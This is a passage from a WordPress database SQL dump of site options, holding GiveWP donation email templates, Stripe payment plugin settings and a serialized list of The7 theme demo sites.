your donation:\n\n<strong>Donor:</strong> {fullname}\n<strong>Donation:</strong> {donation}\n<strong>Donation Date:</strong> {date}\n<strong>Amount:</strong> {amount}\n<strong>Payment Method:</strong> {payment_method}\n<strong>Payment ID:</strong> {payment_id}\n\n{receipt_link}\n\n\n\nSincerely,\n{sitename}\n\";s:26:\"new-donation_email_message\";s:280:\"Hi there,\n\nThis email is to inform you that a new donation has been made on your website: {site_url}.\n\n<strong>Donor:</strong> {name}\n<strong>Donation:</strong> {donation}\n<strong>Amount:</strong> {amount}\n<strong>Payment Method:</strong> {payment_method}\n\nThank you,\n\n{sitename}\n\";s:22:\"new-donation_recipient\";a:1:{i:0;s:20:\"ay.zaghweb@gmail.com\";}s:30:\"new-offline-donation_recipient\";a:1:{i:0;s:20:\"ay.zaghweb@gmail.com\";}s:28:\"new-donor-register_recipient\";a:1:{i:0;s:20:\"ay.zaghweb@gmail.com\";}s:25:\"new-donation_notification\";s:7:\"enabled\";s:12:\"success_page\";i:18;s:12:\"failure_page\";i:19;s:20:\"donor_dashboard_page\";i:20;s:41:\"override_legacy_donation_management_pages\";s:7:\"enabled\";s:12:\"history_page\";i:20;s:18:\"subscriptions_page\";i:20;}','no'),
(311,'give_default_api_version','v1','no'),
(312,'dnctiavkr_give_donors_db_version','1.0','no'),
(313,'dnctiavkr_give_donormeta_db_version','1.0','no'),
(314,'dnctiavkr_give_comments_db_version','1.0','no'),
(315,'dnctiavkr_give_commentmeta_db_version','1.0','no'),
(316,'dnctiavkr_give_sessions_db_version','1.0','no'),
(317,'dnctiavkr_give_formmeta_db_version','1.0','no'),
(318,'dnctiavkr_give_sequential_ordering_db_version','1.0','no'),
(319,'dnctiavkr_give_donationmeta_db_version','1.0','no'),
(321,'give_completed_upgrades','a:41:{i:0;b:0;i:1;s:25:\"v18_upgrades_core_setting\";i:2;s:30:\"v220_rename_donation_meta_type\";i:3;s:38:\"v270_store_stripe_account_for_donation\";i:4;s:17:\"v20_logs_upgrades\";i:5;s:30:\"upgrade_give_user_caps_cleanup\";i:6;s:32:\"upgrade_give_payment_customer_id\";i:7;s:27:\"upgrade_give_offline_status\";i:8;s:26:\"v18_upgrades_form_metadata\";i:9;s:30:\"v189_upgrades_levels_post_meta\";i:10;s:26:\"v1812_update_amount_values\";i:11;s:34:\"v1812_update_donor_purchase_values\";i:12;s:23:\"v1813_update_user_roles\";i:13;s:29:\"v1813_update_donor_user_roles\";i:14;s:43:\"v1817_update_donation_iranian_currency_code\";i:15;s:24:\"v1817_cleanup_user_roles\";i:16;s:39:\"v1818_assign_custom_amount_set_donation\";i:17;s:30:\"v1818_give_worker_role_cleanup\";i:18;s:26:\"v20_upgrades_form_metadata\";i:19;s:32:\"v20_move_metadata_into_new_table\";i:20;s:23:\"v20_rename_donor_tables\";i:21;s:23:\"v20_upgrades_donor_name\";i:22;s:25:\"v20_upgrades_user_address\";i:23;s:29:\"v20_upgrades_payment_metadata\";i:24;s:30:\"v201_upgrades_payment_metadata\";i:25;s:23:\"v201_add_missing_donors\";i:26;s:33:\"v201_move_metadata_into_new_table\";i:27;s:18:\"v201_logs_upgrades\";i:28;s:32:\"v210_verify_form_status_upgrades\";i:29;s:25:\"v213_delete_donation_meta\";i:30;s:28:\"v215_update_donor_user_roles\";i:31;s:22:\"v224_update_donor_meta\";i:32;s:31:\"v224_update_donor_meta_forms_id\";i:33;s:20:\"v230_move_donor_note\";i:34;s:23:\"v230_move_donation_note\";i:35;s:41:\"v230_delete_donor_wall_related_donor_data\";i:36;s:43:\"v230_delete_donor_wall_related_comment_data\";i:37;s:30:\"v240_update_form_goal_progress\";i:38;s:21:\"v241_remove_sale_logs\";i:39;s:39:\"add-past-donation-data-to-revenue-table\";i:40;s:21:\"migrate_existing_logs\";}','no'),
(322,'give_version','2.25.2','no'),
(324,'widget_give_forms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(327,'give_install_pages_created','1','no'),
(330,'_give_table_check','1693293054','no'),
(335,'give_onboarding','a:1:{s:7:\"form_id\";i:21;}','yes'),
(339,'AcceptStripePayments-settings','a:36:{s:7:\"is_live\";i:0;s:16:\"debug_log_enable\";i:0;s:14:\"dont_save_card\";i:0;s:13:\"currency_code\";s:3:\"USD\";s:11:\"button_text\";s:7:\"Buy Now\";s:17:\"popup_button_text\";s:6:\"Pay %s\";s:21:\"use_new_button_method\";i:0;s:12:\"checkout_url\";s:53:\"https://gsw2023.com/index.php/stripe-checkout-result/\";s:18:\"from_email_address\";s:31:\"Gsw2023 <sales@your-domain.com>\";s:19:\"buyer_email_subject\";s:26:\"Thank you for the purchase\";s:16:\"buyer_email_body\";s:93:\"Hello\r\n\r\nThank you for your purchase! You ordered the following item(s):\r\n\r\n{product_details}\";s:25:\"seller_notification_email\";s:20:\"ay.zaghweb@gmail.com\";s:20:\"seller_email_subject\";s:28:\"Notification of product sale\";s:17:\"seller_email_body\";s:129:\"Dear Seller\r\n\r\nThis mail is to notify you of a product sale.\r\n\r\n{product_details}\r\n\r\nThe sale was made to {payer_email}\r\n\r\nThanks\";s:18:\"price_currency_pos\";s:4:\"left\";s:17:\"price_decimal_sep\";s:1:\".\";s:18:\"price_thousand_sep\";s:1:\",\";s:18:\"price_decimals_num\";s:1:\"2\";s:18:\"api_keys_separated\";b:1;s:20:\"stripe_receipt_email\";i:0;s:20:\"custom_field_enabled\";i:0;s:17:\"custom_field_name\";s:0:\"\";s:18:\"custom_field_descr\";s:0:\"\";s:17:\"custom_field_type\";s:4:\"text\";s:22:\"custom_field_mandatory\";i:0;s:19:\"send_email_on_error\";i:0;s:22:\"send_email_on_error_to\";s:20:\"ay.zaghweb@gmail.com\";s:34:\"send_email_on_daily_txn_rate_limit\";i:1;s:37:\"send_email_on_daily_txn_rate_limit_to\";s:20:\"ay.zaghweb@gmail.com\";s:21:\"use_old_checkout_api1\";i:0;s:31:\"disable_buttons_before_js_loads\";i:0;s:8:\"tos_text\";s:105:\"I accept the <a href=\"https://example.com/terms-and-conditions/\" target=\"_blank\">Terms and Conditions</a>\";s:31:\"daily_txn_limit_without_captcha\";i:25;s:28:\"daily_txn_limit_with_captcha\";i:100;s:16:\"checkout_page_id\";i:22;s:16:\"products_page_id\";i:23;}','yes'),
(340,'the7pt_flush_rewrite_rules','','yes'),
(345,'widget_presscore-portfolio','a:3:{i:2;a:7:{s:5:\"title\";s:15:\"Recent Projects\";s:5:\"order\";s:4:\"DESC\";s:7:\"orderby\";s:4:\"date\";s:6:\"select\";s:3:\"all\";s:4:\"show\";i:6;s:4:\"cats\";a:0:{}s:9:\"max_width\";i:150;}i:3;a:7:{s:5:\"title\";s:15:\"Recent Projects\";s:5:\"order\";s:4:\"DESC\";s:7:\"orderby\";s:4:\"date\";s:6:\"select\";s:3:\"all\";s:4:\"show\";i:6;s:4:\"cats\";a:0:{}s:9:\"max_width\";i:140;}s:12:\"_multiwidget\";i:1;}','yes'),
(358,'the7_options_saved','1','no'),
(368,'the7pt_db_version','2.2.4','yes'),
(413,'asp_cache_key','8cfdc3137c87de351be40959b599568f','yes'),
(440,'_mphb_wp_session_expires_2f713c3f76d7a2d4ed63aac9a6aa5842','1664839307','no'),
(460,'the7_demo_content_items_list','a:73:{s:7:\"landing\";a:10:{s:5:\"title\";s:7:\"Landing\";s:2:\"id\";s:7:\"landing\";s:10:\"screenshot\";s:46:\"//repo.the7.io/demo-content/assets/landing.jpg\";s:4:\"link\";s:16:\"https://the7.io/\";s:16:\"required_plugins\";a:3:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:14:\"elementor-main\";a:10:{s:5:\"title\";s:9:\"Main Demo\";s:2:\"id\";s:14:\"elementor-main\";s:10:\"screenshot\";s:53:\"//repo.the7.io/demo-content/assets/elementor-main.jpg\";s:4:\"link\";s:30:\"https://the7.io/elementor-main\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";i:3;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:20:\"elementor-restaurant\";a:10:{s:5:\"title\";s:10:\"Restaurant\";s:2:\"id\";s:20:\"elementor-restaurant\";s:10:\"screenshot\";s:59:\"//repo.the7.io/demo-content/assets/elementor-restaurant.jpg\";s:4:\"link\";s:36:\"https://the7.io/elementor-restaurant\";s:16:\"required_plugins\";a:2:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:17:\"elementor-company\";a:10:{s:5:\"title\";s:7:\"Company\";s:2:\"id\";s:17:\"elementor-company\";s:10:\"screenshot\";s:56:\"//repo.the7.io/demo-content/assets/elementor-company.jpg\";s:4:\"link\";s:33:\"https://the7.io/elementor-company\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";i:3;s:9:\"revslider\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:6:\"retail\";a:10:{s:5:\"title\";s:11:\"Retail Shop\";s:2:\"id\";s:6:\"retail\";s:10:\"screenshot\";s:45:\"//repo.the7.io/demo-content/assets/retail.jpg\";s:4:\"link\";s:22:\"https://the7.io/retail\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:14:\"elementor-shop\";a:10:{s:5:\"title\";s:11:\"Online Shop\";s:2:\"id\";s:14:\"elementor-shop\";s:10:\"screenshot\";s:53:\"//repo.the7.io/demo-content/assets/elementor-shop.jpg\";s:4:\"link\";s:30:\"https://the7.io/elementor-shop\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:4:\"main\";a:10:{s:5:\"title\";s:17:\"Classic Main Demo\";s:2:\"id\";s:4:\"main\";s:10:\"screenshot\";s:43:\"//repo.the7.io/demo-content/assets/main.jpg\";s:4:\"link\";s:21:\"https://the7.io/main/\";s:16:\"required_plugins\";a:6:{i:0;s:12:\"dt-the7-core\";i:1;s:10:\"go_pricing\";i:2;s:11:\"js_composer\";i:3;s:9:\"revslider\";i:4;s:18:\"Ultimate_VC_Addons\";i:5;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"accounting\";a:10:{s:5:\"title\";s:10:\"Accounting\";s:2:\"id\";s:10:\"accounting\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/accounting.jpg\";s:4:\"link\";s:26:\"https://the7.io/accounting\";s:16:\"required_plugins\";a:3:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"sales-page\";a:10:{s:5:\"title\";s:18:\"Sales Landing Page\";s:2:\"id\";s:10:\"sales-page\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/sales-page.jpg\";s:4:\"link\";s:27:\"https://the7.io/sales-page/\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:8:\"one page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:6:\"winery\";a:10:{s:5:\"title\";s:6:\"Winery\";s:2:\"id\";s:6:\"winery\";s:10:\"screenshot\";s:45:\"//repo.the7.io/demo-content/assets/winery.jpg\";s:4:\"link\";s:23:\"https://the7.io/winery/\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:16:\"elementor-agency\";a:10:{s:5:\"title\";s:16:\"Elementor Agency\";s:2:\"id\";s:16:\"elementor-agency\";s:10:\"screenshot\";s:55:\"//repo.the7.io/demo-content/assets/elementor-agency.jpg\";s:4:\"link\";s:33:\"https://the7.io/elementor-agency/\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:12:\"dt-the7-core\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:13:\"fashion-store\";a:10:{s:5:\"title\";s:13:\"Fashion Store\";s:2:\"id\";s:13:\"fashion-store\";s:10:\"screenshot\";s:52:\"//repo.the7.io/demo-content/assets/fashion-store.jpg\";s:4:\"link\";s:30:\"https://the7.io/fashion-store/\";s:16:\"required_plugins\";a:5:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:12:\"dt-the7-core\";i:3;s:9:\"revslider\";i:4;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:12:\"fashion-blog\";a:10:{s:5:\"title\";s:12:\"Fashion Blog\";s:2:\"id\";s:12:\"fashion-blog\";s:10:\"screenshot\";s:51:\"//repo.the7.io/demo-content/assets/fashion-blog.jpg\";s:4:\"link\";s:29:\"https://the7.io/fashion-blog/\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:12:\"dt-the7-core\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:17:\"business-advisors\";a:10:{s:5:\"title\";s:17:\"Business Advisors\";s:2:\"id\";s:17:\"business-advisors\";s:10:\"screenshot\";s:56:\"//repo.the7.io/demo-content/assets/business-advisors.jpg\";s:4:\"link\";s:34:\"https://the7.io/business-advisors/\";s:16:\"required_plugins\";a:4:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:12:\"dt-the7-core\";i:3;s:11:\"woocommerce\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:14:\"online-courses\";a:10:{s:5:\"title\";s:14:\"Online Courses\";s:2:\"id\";s:14:\"online-courses\";s:10:\"screenshot\";s:53:\"//repo.the7.io/demo-content/assets/online-courses.jpg\";s:4:\"link\";s:31:\"https://the7.io/online-courses/\";s:16:\"required_plugins\";a:5:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:12:\"dt-the7-core\";i:3;s:4:\"give\";i:4;s:11:\"woocommerce\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:32:\"elementor-minimal-creative-light\";a:10:{s:5:\"title\";s:22:\"Minimal Creative Light\";s:2:\"id\";s:32:\"elementor-minimal-creative-light\";s:10:\"screenshot\";s:71:\"//repo.the7.io/demo-content/assets/elementor-minimal-creative-light.jpg\";s:4:\"link\";s:49:\"https://the7.io/elementor-minimal-creative-light/\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:12:\"dt-the7-core\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:31:\"elementor-minimal-creative-dark\";a:10:{s:5:\"title\";s:31:\"Elementor Minimal Creative Dark\";s:2:\"id\";s:31:\"elementor-minimal-creative-dark\";s:10:\"screenshot\";s:70:\"//repo.the7.io/demo-content/assets/elementor-minimal-creative-dark.jpg\";s:4:\"link\";s:48:\"https://the7.io/elementor-minimal-creative-dark/\";s:16:\"required_plugins\";a:3:{i:0;s:9:\"elementor\";i:1;s:12:\"pro-elements\";i:2;s:12:\"dt-the7-core\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:9:\"logistics\";a:10:{s:5:\"title\";s:15:\"Seven Logistics\";s:2:\"id\";s:9:\"logistics\";s:10:\"screenshot\";s:48:\"//repo.the7.io/demo-content/assets/logistics.jpg\";s:4:\"link\";s:26:\"https://the7.io/logistics/\";s:16:\"required_plugins\";a:4:{i:0;s:14:\"contact-form-7\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";i:3;s:12:\"dt-the7-core\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"consulting\";a:10:{s:5:\"title\";s:16:\"Seven Consulting\";s:2:\"id\";s:10:\"consulting\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/consulting.jpg\";s:4:\"link\";s:27:\"https://the7.io/consulting/\";s:16:\"required_plugins\";a:4:{i:0;s:14:\"contact-form-7\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";i:3;s:12:\"dt-the7-core\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:18:\"elementor-business\";a:10:{s:5:\"title\";s:18:\"Elementor Business\";s:2:\"id\";s:18:\"elementor-business\";s:10:\"screenshot\";s:57:\"//repo.the7.io/demo-content/assets/elementor-business.jpg\";s:4:\"link\";s:35:\"https://the7.io/elementor-business/\";s:16:\"required_plugins\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";i:3;s:12:\"dt-the7-core\";i:4;s:9:\"revslider\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:8:\"clothing\";a:10:{s:5:\"title\";s:8:\"Clothing\";s:2:\"id\";s:8:\"clothing\";s:10:\"screenshot\";s:47:\"//repo.the7.io/demo-content/assets/clothing.jpg\";s:4:\"link\";s:25:\"https://the7.io/clothing/\";s:16:\"required_plugins\";a:6:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";i:4;s:11:\"woocommerce\";i:5;s:23:\"ti-woocommerce-wishlist\";}s:4:\"tags\";a:3:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";i:2;s:5:\"store\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:16:\"wpbakery-starter\";a:10:{s:5:\"title\";s:16:\"WPBakery Starter\";s:2:\"id\";s:16:\"wpbakery-starter\";s:10:\"screenshot\";s:55:\"//repo.the7.io/demo-content/assets/wpbakery-starter.jpg\";s:4:\"link\";s:33:\"https://the7.io/wpbakery-starter/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:17:\"elementor-starter\";a:10:{s:5:\"title\";s:17:\"Elementor Starter\";s:2:\"id\";s:17:\"elementor-starter\";s:10:\"screenshot\";s:56:\"//repo.the7.io/demo-content/assets/elementor-starter.jpg\";s:4:\"link\";s:34:\"https://the7.io/elementor-starter/\";s:16:\"required_plugins\";a:3:{i:0;s:12:\"dt-the7-core\";i:1;s:9:\"elementor\";i:2;s:12:\"pro-elements\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:9:\"elementor\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:7:\"company\";a:10:{s:5:\"title\";s:7:\"Company\";s:2:\"id\";s:7:\"company\";s:10:\"screenshot\";s:46:\"//repo.the7.io/demo-content/assets/company.jpg\";s:4:\"link\";s:24:\"https://the7.io/company/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:13:\"beauty-studio\";a:10:{s:5:\"title\";s:13:\"Beauty Studio\";s:2:\"id\";s:13:\"beauty-studio\";s:10:\"screenshot\";s:52:\"//repo.the7.io/demo-content/assets/beauty-studio.jpg\";s:4:\"link\";s:30:\"https://the7.io/beauty-studio/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:6:\"dental\";a:10:{s:5:\"title\";s:6:\"Dental\";s:2:\"id\";s:6:\"dental\";s:10:\"screenshot\";s:45:\"//repo.the7.io/demo-content/assets/dental.jpg\";s:4:\"link\";s:23:\"https://the7.io/dental/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:9:\"revslider\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:10:\"dev-studio\";a:10:{s:5:\"title\";s:9:\"Seven Dev\";s:2:\"id\";s:10:\"dev-studio\";s:10:\"screenshot\";s:49:\"//repo.the7.io/demo-content/assets/dev-studio.jpg\";s:4:\"link\";s:27:\"https://the7.io/dev-studio/\";s:16:\"required_plugins\";a:3:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:12:\"nutritionist\";a:10:{s:5:\"title\";s:12:\"Nutritionist\";s:2:\"id\";s:12:\"nutritionist\";s:10:\"screenshot\";s:51:\"//repo.the7.io/demo-content/assets/nutritionist.jpg\";s:4:\"link\";s:29:\"https://the7.io/nutritionist/\";s:16:\"required_plugins\";a:4:{i:0;s:9:\"revslider\";i:1;s:12:\"dt-the7-core\";i:2;s:11:\"js_composer\";i:3;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:7:\"wedding\";a:10:{s:5:\"title\";s:7:\"Wedding\";s:2:\"id\";s:7:\"wedding\";s:10:\"screenshot\";s:46:\"//repo.the7.io/demo-content/assets/wedding.jpg\";s:4:\"link\";s:24:\"https://the7.io/wedding/\";s:16:\"required_plugins\";a:5:{i:0;s:9:\"revslider\";i:1;s:12:\"dt-the7-core\";i:2;s:14:\"contact-form-7\";i:3;s:11:\"js_composer\";i:4;s:18:\"Ultimate_VC_Addons\";}s:4:\"tags\";a:2:{i:0;s:8:\"one page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:4:\"yoga\";a:10:{s:5:\"title\";s:4:\"Yoga\";s:2:\"id\";s:4:\"yoga\";s:10:\"screenshot\";s:43:\"//repo.the7.io/demo-content/assets/yoga.jpg\";s:4:\"link\";s:21:\"https://the7.io/yoga/\";s:16:\"required_plugins\";a:5:{i:0;s:12:\"dt-the7-core\";i:1;s:14:\"contact-form-7\";i:2;s:11:\"js_composer\";i:3;s:18:\"Ultimate_VC_Addons\";i:4;s:15:\"stripe-payments\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:5:\"hotel\";a:10:{s:5:\"title\";s:5:\"Hotel\";s:2:\"id\";s:5:\"hotel\";s:10:\"screenshot\";s:44:\"//repo.the7.io/demo-content/assets/hotel.jpg\";s:4:\"link\";s:22:\"https://the7.io/hotel/\";s:16:\"required_plugins\";a:6:{i:0;s:9:\"revslider\";i:1;s:12:\"dt-the7-core\";i:2;s:14:\"contact-form-7\";i:3;s:11:\"js_composer\";i:4;s:18:\"Ultimate_VC_Addons\";i:5;s:28:\"motopress-hotel-booking-lite\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:6:\"church\";a:10:{s:5:\"title\";s:6:\"Church\";s:2:\"id\";s:6:\"church\";s:10:\"screenshot\";s:45:\"//repo.the7.io/demo-content/assets/church.jpg\";s:4:\"link\";s:23:\"https://the7.io/church/\";s:16:\"required_plugins\";a:4:{i:0;s:12:\"dt-the7-core\";i:1;s:11:\"js_composer\";i:2;s:18:\"Ultimate_VC_Addons\";i:3;s:4:\"give\";}s:4:\"tags\";a:2:{i:0;s:10:\"multi page\";i:1;s:8:\"wpbakery\";}s:17:\"attachments_batch\";i:3;s:19:\"include_attachments\";b:1;s:11:\"top_content\";s:0:\"\";s:14:\"bottom_content\";s:0:\"\";}s:15:\"modern-business\";a:10:{s:5:\"title\";s:15:\"Modern 